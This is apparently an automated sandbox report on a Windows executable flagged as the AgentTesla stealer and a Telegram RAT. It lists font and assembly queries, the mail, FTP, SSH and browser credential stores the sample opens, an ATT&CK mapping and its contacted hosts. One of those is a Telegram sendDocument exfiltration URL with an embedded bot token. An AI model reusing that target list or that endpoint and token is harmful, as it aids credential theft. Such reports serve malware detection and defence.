Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Users\user\Desktop\rzN2ckYW24.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\rzN2ckYW24.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Desktop\rzN2ckYW24.exe

Code function: 2_2_05C45880 GetUserNameW,

2_2_05C45880

Stealing of Sensitive Information

Yara detected Telegram RAT

Source: Yara match	File source: 00000002.00000002.522385247.0000000002801000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rzN2ckYW24.exe PID: 6128, type: MEMORYSTR

Yara detected AgentTesla

Source: Yara match	File source: 0.2.rzN2ckYW24.exe.3dd31a8.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.rzN2ckYW24.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.rzN2ckYW24.exe.3e099c8.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.rzN2ckYW24.exe.3d99188.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.rzN2ckYW24.exe.3e099c8.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.rzN2ckYW24.exe.3dd31a8.13.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000000.279572374.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.299828968.0000000003D99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.522788647.0000000002854000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rzN2ckYW24.exe PID: 3044, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rzN2ckYW24.exe PID: 6128, type: MEMORYSTR

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\rzN2ckYW24.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\Desktop\rzN2ckYW24.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\rzN2ckYW24.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\			Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml			Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\rzN2ckYW24.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini			Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior

Source: Yara match	File source: 00000002.00000002.522788647.0000000002854000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.522385247.0000000002801000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rzN2ckYW24.exe PID: 6128, type: MEMORYSTR

Remote Access Functionality

Yara detected Telegram RAT

Source: Yara match	File source: 00000002.00000002.522385247.0000000002801000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rzN2ckYW24.exe PID: 6128, type: MEMORYSTR

Yara detected AgentTesla

Source: Yara match	File source: 0.2.rzN2ckYW24.exe.3dd31a8.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.rzN2ckYW24.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.rzN2ckYW24.exe.3e099c8.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.rzN2ckYW24.exe.3d99188.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.rzN2ckYW24.exe.3e099c8.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.rzN2ckYW24.exe.3dd31a8.13.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000000.279572374.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.299828968.0000000003D99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.522788647.0000000002854000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rzN2ckYW24.exe PID: 3044, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rzN2ckYW24.exe PID: 6128, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	211 Windows Management Instrumentation	Path Interception	111 Process Injection	1 Disable or Modify Tools	2 OS Credential Dumping	1 Account Discovery	Remote Services	11 Archive Collected Data	Exfiltration Over Other Network Medium	1 Web Service	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Deobfuscate/Decode Files or Information	1 Credentials in Registry	114 System Information Discovery	Remote Desktop Protocol	2 Data from Local System	Exfiltration Over Bluetooth	1 Ingress Tool Transfer	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	2 Obfuscated Files or Information	Security Account Manager	211 Security Software Discovery	SMB/Windows Admin Shares	1 Email Collection	Automated Exfiltration	11 Encrypted Channel	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	13 Software Packing	NTDS	1 Process Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	3 Non-Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 Timestomp	LSA Secrets	131 Virtualization/Sandbox Evasion	SSH	Keylogging	Data Transfer Size Limits	14 Application Layer Protocol	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	1 Masquerading	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	131 Virtualization/Sandbox Evasion	DCSync	1 System Owner/User Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	111 Process Injection	Proc Filesystem	1 Remote System Discovery	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Masquerading	/etc/passwd and /etc/shadow	1 System Network Configuration Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
rzN2ckYW24.exe	30%	Virustotal		Browse
rzN2ckYW24.exe	32%	ReversingLabs	ByteCode-MSIL.Backdoor.Androm
rzN2ckYW24.exe	100%	Joe Sandbox ML

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
2.0.rzN2ckYW24.exe.400000.0.unpack	100%	Avira	TR/Spy.Gen8		Download File

Domains

Source	Detection	Scanner	Label	Link
api.ipify.org.herokudns.com	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://www.sajatypeworks.comiv	0%	URL Reputation	safe
http://www.sajatypeworks.comiv	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.sakkal.comrm	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/a-d	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://DynDns.comDynDNSnamejidpasswordPsi/Psi	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://127.0.0.1:HTTP/1.1	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/Y0	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.sajatypeworks.coma	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/dz	0%	Virustotal		Browse
http://www.fontbureau.comF	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www	0%	URL Reputation	safe
http://en.wikipedia	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/jp/	0%	URL Reputation	safe
http://www.fontbureau.coma	0%	URL Reputation	safe
http://www.fontbureau.comd	0%	URL Reputation	safe
http://en.w	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
https://api.ipify.orgappdatajVuurjVuur.exe/http://TMVuQQ.com	0%	Avira URL Cloud	safe
http://www.founder.com.cB	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/dz	0%	Avira URL Cloud	safe
http://www.fontbureau.commTTF	0%	Avira URL Cloud	safe
https://api.telegram.org4Tkh	0%	Avira URL Cloud	safe
http://www.fontbureau.comcomF	0%	URL Reputation	safe
http://www.fontbureau.comm	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.fontbureau.comp	0%	URL Reputation	safe
http://www.fontbureau.comals	0%	URL Reputation	safe
http://www.fontbureau.comitum	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/b	0%	URL Reputation	safe
http://wmwpuO0P35oL9Q.com	0%	Avira URL Cloud	safe
http://www.fontbureau.comcomp	0%	Avira URL Cloud	safe
http://www.galapagosdesign.com/staff/dennis.htmp	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp//ra	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cns-ea	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
api.ipify.org.herokudns.com	3.220.57.224	true	false	0%, Virustotal, Browse	unknown
api.telegram.org	149.154.167.220	true	false		high
api.ipify.org	unknown	unknown	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://api.ipify.org/	false		high
https://api.telegram.org/bot5577155192:AAEz6ZTkghx2RsdTxeeE-sDulPHc5WQblVg/sendDocument	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://127.0.0.1:HTTP/1.1	rzN2ckYW24.exe, 00000002.00000002.522385247.0000000002801000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://www.fontbureau.com/designersG	rzN2ckYW24.exe, 00000000.00000002.305428250.0000000006E92000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.sajatypeworks.comiv	rzN2ckYW24.exe, 00000000.00000003.258445715.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.257102086.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.259940209.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.259819475.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.259520848.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.257053691.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.258806192.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.261728305.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.260344832.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.257296101.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.260291295.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.261561559.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.258343538.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.260210658.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.261692319.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.257200608.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.258935636.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.261197728.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.257254857.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.258324367.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.261444840.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
